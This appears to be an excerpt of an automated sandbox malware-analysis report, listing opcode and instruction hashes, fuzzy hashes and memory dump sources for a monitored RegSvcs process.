                                                                                • Opcode Fuzzy Hash: ae9d72851915523878f16b9cd24c13245b133e2210c8b1622926dc5e3fa9d021
                                                                                • Instruction Fuzzy Hash: 49118B75504284DFCB15CF14D9D4B15BBB2FB84314F28C6A9E8494B656C33AD84ACF62
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e50ac2f8c25f6d230210e261f757b2b0d67f0e37cadf10c0b36100ac8c18063
                                                                                • Instruction ID: 4020bd7c685b0033462f178616f123da45b9c7b491de8e2fdf12dbf10639410c
                                                                                • Opcode Fuzzy Hash: 0e50ac2f8c25f6d230210e261f757b2b0d67f0e37cadf10c0b36100ac8c18063
                                                                                • Instruction Fuzzy Hash: C7119E78D0034AEFDF00DFA8D844AAEBBB1FB89300F108066D914A7354D7356A41DF91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: edde18aa461cabf271816d136468feaff12ad60debe1471e5ed84f036a1c3558
                                                                                • Instruction ID: 11809d51b0a9f2befac309f75b4c2a37191b9194f9bddc768d8be7e840c5f4ca
                                                                                • Opcode Fuzzy Hash: edde18aa461cabf271816d136468feaff12ad60debe1471e5ed84f036a1c3558
                                                                                • Instruction Fuzzy Hash: 41F0F031B106104B87256A3E9854A2AB6EFEFC8B7131D847BE905CB361EE21CC038386
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9bf81945789eb7de5cac4bdfbade24fab8b0d66a3a847368fd51a5cb99fda287
                                                                                • Instruction ID: d3aa095a897814e5e2feec7737538474277f2df7ba8add728a4725c6b2c441b9
                                                                                • Opcode Fuzzy Hash: 9bf81945789eb7de5cac4bdfbade24fab8b0d66a3a847368fd51a5cb99fda287
                                                                                • Instruction Fuzzy Hash: ADF0E272A0D3C5AFDF139B9084442ACFFB2DF52321F1980DBD5808B262C3744A89D751
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4640c1f9842037d0db26c351720eda238f166078a9d5e56ce1664ee27a87557d
                                                                                • Instruction ID: 9fac8014f2d0c5354ad648261bc7b6ac0bea9485267f2d1487cb04e445bb65f0
                                                                                • Opcode Fuzzy Hash: 4640c1f9842037d0db26c351720eda238f166078a9d5e56ce1664ee27a87557d
                                                                                • Instruction Fuzzy Hash: E2D02E6300C2642EE722010E3C81A932F0EC2C23B0B2A01A7F528E32029C414C4262B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e669fff3b11999b1253fb121837dedceddea9821c8b82edf2f632454db99655
                                                                                • Instruction ID: 3a10707e642cefafaf56dc37553872e000714f33a5b53bede8a9b0d96233b647
                                                                                • Opcode Fuzzy Hash: 5e669fff3b11999b1253fb121837dedceddea9821c8b82edf2f632454db99655
                                                                                • Instruction Fuzzy Hash: EFE02676D206A6CBCB02E7B19C500EEF738BDE2212B58465BC06272081FB30121AC7A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f27ae6ebcd4b5f874169219751e6fa2ce85426806a3516ed5db303ca481a837
                                                                                • Instruction ID: d8289c5eaf4fdb99017fe8ec1b2f7f9b39c633cc0e4cc3cd601a26be0f70be66
                                                                                • Opcode Fuzzy Hash: 1f27ae6ebcd4b5f874169219751e6fa2ce85426806a3516ed5db303ca481a837
                                                                                • Instruction Fuzzy Hash: F1E0C23501834E8ACB02B778BC5A2583F5BA9A231C71C86A7D004CE25BDE796A1587A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a8dc3f913fb2443c907767535392ebae99f29d9172c6dd89fe6111874514c11
                                                                                • Instruction ID: 7646d466cd161bf72352935b2ba85b02f33d58e5121708f48fef7e778f0d09b8
                                                                                • Opcode Fuzzy Hash: 7a8dc3f913fb2443c907767535392ebae99f29d9172c6dd89fe6111874514c11
                                                                                • Instruction Fuzzy Hash: 41D01732D202AA978B04A6A6DC048EEF73DEE96221B908626D52437140EB706669C7E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 15d9bdbe8da6956bda306f9f933ed06837fb3f41c84af04895e0c1db7fe70efa
                                                                                • Instruction ID: fe2c97a816ddda17d051fc011f4afd2ec72cf6deeb4ea0bd999512fde00b4ff6
                                                                                • Opcode Fuzzy Hash: 15d9bdbe8da6956bda306f9f933ed06837fb3f41c84af04895e0c1db7fe70efa
                                                                                • Instruction Fuzzy Hash: EBD04239E4510DCBCB30DFA8E4944DCBBB1EF49321B24942AD929A3251D6345465CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61e8bd88f9820c011cceffd339c56c34617f8417966e99b7e85d1312eedbf079
                                                                                • Instruction ID: 6b55c465a8585133626478bd0964171cd882a8946008404c9a67020908667499
                                                                                • Opcode Fuzzy Hash: 61e8bd88f9820c011cceffd339c56c34617f8417966e99b7e85d1312eedbf079
                                                                                • Instruction Fuzzy Hash: 52D0677AB40008DBCB049F99E8809DDF776FB98221B04C516E915A3260C6319935DB60
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4e6c257e647bf27b9013700f2d5299b442282c62176e74ef0d7fd6f25c36e12
                                                                                • Instruction ID: 6fcd931cb0079fc5269bc8e88e6fb1318f7f7f42b436d482f2586ef65e797fba
                                                                                • Opcode Fuzzy Hash: b4e6c257e647bf27b9013700f2d5299b442282c62176e74ef0d7fd6f25c36e12
                                                                                • Instruction Fuzzy Hash: 81C0123412030A87D500BB75FC56759375AAA90704744D65591054A119DE7D5A144A84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "
                                                                                • API String ID: 0-123907689
                                                                                • Opcode ID: 44eb8626801e4b5025e06b307ec9ed0b1ad2551f323bf6231c66dce84cc2e981
                                                                                • Instruction ID: dcc52424fe628f4096729c7b4b1ceaf05bfbf52e0e26be0603e5e265a33e2186
                                                                                • Opcode Fuzzy Hash: 44eb8626801e4b5025e06b307ec9ed0b1ad2551f323bf6231c66dce84cc2e981
                                                                                • Instruction Fuzzy Hash: 53F1E370E002188FEB54DFA9C484BDEFBF2AF89314F248169E448AB395D7749986CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: q
                                                                                • API String ID: 0-4110462503
                                                                                • Opcode ID: 4775151d740fdbb1f18eabbd5d8ae7b33ae98625bed12cfa858c4c1474efdf47
                                                                                • Instruction ID: 18f4b73c554d00fe91ab3966856eba0e5b51ae73f2e4f37b6a186cc82aa7bcd7
                                                                                • Opcode Fuzzy Hash: 4775151d740fdbb1f18eabbd5d8ae7b33ae98625bed12cfa858c4c1474efdf47
                                                                                • Instruction Fuzzy Hash: 1D710874E01259CFEB29DF66D850BADBBB2BF89300F14C0EAD408A7655EB345A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 038af32cbcb97d3a23fb81f3d24bf38c8e68d6cb4bebe87f92ccde17fcf47ed6
                                                                                • Instruction ID: c603b1a3545235af8ea493bf88dcce07ebe211c1cb10c05fde855c3e9e5b0324
                                                                                • Opcode Fuzzy Hash: 038af32cbcb97d3a23fb81f3d24bf38c8e68d6cb4bebe87f92ccde17fcf47ed6
                                                                                • Instruction Fuzzy Hash: 0222059384E7C18FD79287B848BD2AB7FB5CF62200B5944EFCCC242687E5595802E763
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3b22ae0ea890bbf20f9b76458eae037df89f6a8e9755a56d28977cc6970e422e
                                                                                • Instruction ID: e420a26adf4a1e714ef61cc4aee8c2725c004d6e3feb55dbef9ccfc1376d63cf
                                                                                • Opcode Fuzzy Hash: 3b22ae0ea890bbf20f9b76458eae037df89f6a8e9755a56d28977cc6970e422e
                                                                                • Instruction Fuzzy Hash: 6852AA74E01228CFEB64DF65C884BDEBBB2BB89301F1485EAD409A7255DB359E81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84da7c7e73c875e65d51a4cb5032e53fc6d1fcc894082a2a202843cea6d2a501
                                                                                • Instruction ID: 3049849117e379786ed0a6638bc8aa6f9fcc64838fc7de6e4889fd4db3e54e47
                                                                                • Opcode Fuzzy Hash: 84da7c7e73c875e65d51a4cb5032e53fc6d1fcc894082a2a202843cea6d2a501
                                                                                • Instruction Fuzzy Hash: 23A1E635B04255CBDB08EBB4A85827E7BB3FFC8710B18896EE503E7385CE3598019B55
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ac9491d32d42c09bd75093146a644076d9c673c514171b8051f224667bfc8329
                                                                                • Instruction ID: a6c7e6a52222c19951f3d45029f9fbdafea8b829ef09eaec58e187e308d05dc5
                                                                                • Opcode Fuzzy Hash: ac9491d32d42c09bd75093146a644076d9c673c514171b8051f224667bfc8329
                                                                                • Instruction Fuzzy Hash: E2C1E078E01218CFDB54DFA5C894B9DBBB2BF89300F2480AAD809AB355DB355E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eaee6bd9145ae48f5fb46b731567d37fce096d58adbb1aeea41cbb78d3bcc76b
                                                                                • Instruction ID: 576bf77e334425baafc7fc2b8e85040185c3b026f953b51229a03d2cb5d0bbda
                                                                                • Opcode Fuzzy Hash: eaee6bd9145ae48f5fb46b731567d37fce096d58adbb1aeea41cbb78d3bcc76b
                                                                                • Instruction Fuzzy Hash: 41C1BE78E00218CFEB54DFA5C994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d1b9a91abd8b01da0d7d013f702d526b69e76235cae1497b276478760d63ef8
                                                                                • Instruction ID: b9a71bc0419c0b23acd89ca47e0bb4f2543772d18d825af8cb5c8229ca4ae87f
                                                                                • Opcode Fuzzy Hash: 0d1b9a91abd8b01da0d7d013f702d526b69e76235cae1497b276478760d63ef8
                                                                                • Instruction Fuzzy Hash: 21C1BD78E00218CFEB54DFA5C994BDDBBB2BF89300F2490A9D409AB355DB359A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c57a452623861ccf6a70ff024791342b5b91c4b0943d5c673789fa0b2f4b0770
                                                                                • Instruction ID: 9d8c6c7b887d76c132642e7cb26fddd7f439666851ab33210e8c06e642216134
                                                                                • Opcode Fuzzy Hash: c57a452623861ccf6a70ff024791342b5b91c4b0943d5c673789fa0b2f4b0770
                                                                                • Instruction Fuzzy Hash: 81C1AE78E00218CFEB54DFA5D994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82b9d332472655ad538ffbe2c0671cf7d633db464cd425504a8f5bf429667e6d
                                                                                • Instruction ID: 1c01c61153e49829554ba0ea6f843008413551dc9718144664190e26364a3b0f
                                                                                • Opcode Fuzzy Hash: 82b9d332472655ad538ffbe2c0671cf7d633db464cd425504a8f5bf429667e6d
                                                                                • Instruction Fuzzy Hash: F7C1BD78E00218CFEB54DFA5C994BDDBBB2BF89300F2490A9D409AB355DB359A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7e168b6eece5f5dd9ac3f6f4bc969f4c632bb8f191f00e959b8b02e15612e0ca
                                                                                • Instruction ID: bd5df7f72e446475a691640ab9f28825f23a4802f6a9c9537746fa27917f3337
                                                                                • Opcode Fuzzy Hash: 7e168b6eece5f5dd9ac3f6f4bc969f4c632bb8f191f00e959b8b02e15612e0ca
                                                                                • Instruction Fuzzy Hash: 55C1BE78E00218CFEB54DFA5C994B9DBBB2BF89300F2090A9D409AB355DB355A81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 77a344ed76e3b1897c764804cc3607b0aeccb387f59884211d4bf7c2288fabb7
                                                                                • Instruction ID: 56800a7f83c7daf10ae1e8492cddeece1e9f740fff407f51a4a117f4a48cef51
                                                                                • Opcode Fuzzy Hash: 77a344ed76e3b1897c764804cc3607b0aeccb387f59884211d4bf7c2288fabb7
                                                                                • Instruction Fuzzy Hash: 23C1BF78E00218CFEB54DFA5D994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b6b628ea52aa1e79932d9a96702978766ef1d8401432e10a73f8d4127cd62ab
                                                                                • Instruction ID: 1512e9470870e6820e3d7e115ebc37660476acf2f05e9f9e5a999327ac898507
                                                                                • Opcode Fuzzy Hash: 6b6b628ea52aa1e79932d9a96702978766ef1d8401432e10a73f8d4127cd62ab
                                                                                • Instruction Fuzzy Hash: 44C1AF78E00218CFEB54DFA5D994BDDBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a54fd7e2dd41d3863b0d012d2afea06ee1de4dd20c2038fd2cfec0fd2613f2d9
                                                                                • Instruction ID: dc7621f6e93b47e9febcf7e11f96f9175ff3763bf51c370b99efe678dc742096
                                                                                • Opcode Fuzzy Hash: a54fd7e2dd41d3863b0d012d2afea06ee1de4dd20c2038fd2cfec0fd2613f2d9
                                                                                • Instruction Fuzzy Hash: 00C1CE78E00218CFEB58DFA5D994B9DBBB2AF89300F1090A9D409AB355DB359A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6988848913ca73f6a2796e3405a11aad9fb5548f031c715d422b50ab1605001b
                                                                                • Instruction ID: 15898f0ebf061b4fdd66c31b28e8ca07efd5b315045045985a0a5819a03f4661
                                                                                • Opcode Fuzzy Hash: 6988848913ca73f6a2796e3405a11aad9fb5548f031c715d422b50ab1605001b
                                                                                • Instruction Fuzzy Hash: DEC1CF78E00218CFEB54DFA5D994BDDBBB2BF89300F2090A9D409AB355DB359A81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a722f4df7799bc700362c534f34d35dfc0d1665a1c683fd379ae9b667320384
                                                                                • Instruction ID: 760931e48b612148cf726dac44ac6e5ec36637389a730bc51846e0dbf35ae2e3
                                                                                • Opcode Fuzzy Hash: 7a722f4df7799bc700362c534f34d35dfc0d1665a1c683fd379ae9b667320384
                                                                                • Instruction Fuzzy Hash: 7FC1BE78E00218CFEB54DFA5D994B9DBBB2BF89300F2490A9D409AB355DB359A81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2903cd7f67cc235f8fa51231b7ed6ded34d596d83daa509f87764e48c9c7c63
                                                                                • Instruction ID: d5b43c530653c79fda08e33654c2ae7f4ef4e5573c3b4b705874f29d28694aca
                                                                                • Opcode Fuzzy Hash: a2903cd7f67cc235f8fa51231b7ed6ded34d596d83daa509f87764e48c9c7c63
                                                                                • Instruction Fuzzy Hash: 0B91C171E006188FDB58DFB9C9402EEBBF2AFCA310F149969D519A7391DB348906CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bef2f169c4bc3ccd9118510c81b6800aeb01b40bb56d83f1efdeb9cdfabdf76d
                                                                                • Instruction ID: f26cee58e7c4ae7af298af5e59af30ec5bc0ea13102a6cd0fcf0744bf5f5b7bf
                                                                                • Opcode Fuzzy Hash: bef2f169c4bc3ccd9118510c81b6800aeb01b40bb56d83f1efdeb9cdfabdf76d
                                                                                • Instruction Fuzzy Hash: 0DA10571D107198EDB14EFA9C844ADDFBB2EF89304F14D2AAE45867260EB709A85CF41
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 444cedb7ee870e311303270fe5ee3cc717aac1da7bf683d3cdc84cb920ed72ac
                                                                                • Instruction ID: ad2e88576776076de6617eb7ba5000146f63169e57b339bf28bc3b40e08dd7d9
                                                                                • Opcode Fuzzy Hash: 444cedb7ee870e311303270fe5ee3cc717aac1da7bf683d3cdc84cb920ed72ac
                                                                                • Instruction Fuzzy Hash: ED516C70D00208CBDB04EFA8D844BDEB7B2FF8A310F28C16AE406AB395D7759945DB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0c812829a9979c55829bcd7bb73e098c62c65e1e37752bcd8c2337053235cf43
                                                                                • Instruction ID: 6c24f172a5fad3b45562cca26142f34512ab284cffa83f90c1bb705c2737bb4f
                                                                                • Opcode Fuzzy Hash: 0c812829a9979c55829bcd7bb73e098c62c65e1e37752bcd8c2337053235cf43
                                                                                • Instruction Fuzzy Hash: 00511670D01208CFDB10EFA8D484BAEB7B2BF4A315F28816AE406AB394D7359945EF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad0c7197ab7d8bd3e303edbe02917a7dfadaa882b93e26d89c2bcead9c3a1644
                                                                                • Instruction ID: c35003b4ad99706d6675b80467509c33e1227d7db290c121e01c4409839b4ce9
                                                                                • Opcode Fuzzy Hash: ad0c7197ab7d8bd3e303edbe02917a7dfadaa882b93e26d89c2bcead9c3a1644
                                                                                • Instruction Fuzzy Hash: 8C415870E052888FEB59CFBAD8506DDFBF2AF8A300F24D56AC454AB259DB345946CF10
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 63df9c816cbdf28780b6f5e8282f405893d734219afc9b476e5cc876b83842cb
                                                                                • Instruction ID: fbf77b873ec1ab4908ddaa99e51082f0f130e4b2b9c7adb5615a0223c9b6ebdd
                                                                                • Opcode Fuzzy Hash: 63df9c816cbdf28780b6f5e8282f405893d734219afc9b476e5cc876b83842cb
                                                                                • Instruction Fuzzy Hash: 2F41F9B1D016589BEB58CFAAD8843CEFBF6BF88314F14C52AE418AB294DB740545CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d99f221f7a5991587bba4f51988aafedfbb8918355fc9e127796c7ba4315801
• Instruction ID: 97479f6f2c1883e9d4bc178c853e6f62377be3606bb0afde467c01ed0b7d3c22
• Opcode Fuzzy Hash: 5d99f221f7a5991587bba4f51988aafedfbb8918355fc9e127796c7ba4315801
• Instruction Fuzzy Hash: 0341E270E01248CBEB58DFBAD9406EDFBF2AF89300F24D56AC419AB258DB345946CF54
Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 66bdb5ac78b7b83b4eded922e97db2778547411a8c6f8e142c9496fd53e3cb48
• Instruction ID: a1f42d7e539c0d4453ff2c3da3b36c915298b5c879240b912bac1b086bd7491b
• Opcode Fuzzy Hash: 66bdb5ac78b7b83b4eded922e97db2778547411a8c6f8e142c9496fd53e3cb48
• Instruction Fuzzy Hash: D141F270E012488BEB58DFBAD9446EDFBF2AF89300F24D52AC419BB258DB345946CF54
Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
